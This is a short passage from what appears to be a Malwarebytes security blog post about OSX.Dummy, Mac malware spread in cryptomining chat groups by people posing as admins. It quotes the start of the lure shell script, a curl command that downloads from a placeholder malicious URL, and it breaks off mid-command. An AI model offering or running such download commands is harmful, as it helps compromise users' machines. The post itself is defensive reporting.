blog.malwarebytes.org blog.malwarebytes.org

Mac malware targets cryptomining users

Last week, a security researcher named Remco Verhoef announced the discovery of a new piece of Mac malware being distributed on cryptomining chat groups. This malware was later further analyzed by Patrick Wardle, who gave it the rather appropriate moniker OSX.Dummy. The malware was being distributed by chat users posing as admins, who posted the following shell script for users to run: cd /tmp && curl -s curl $MALICIOUS_URL >...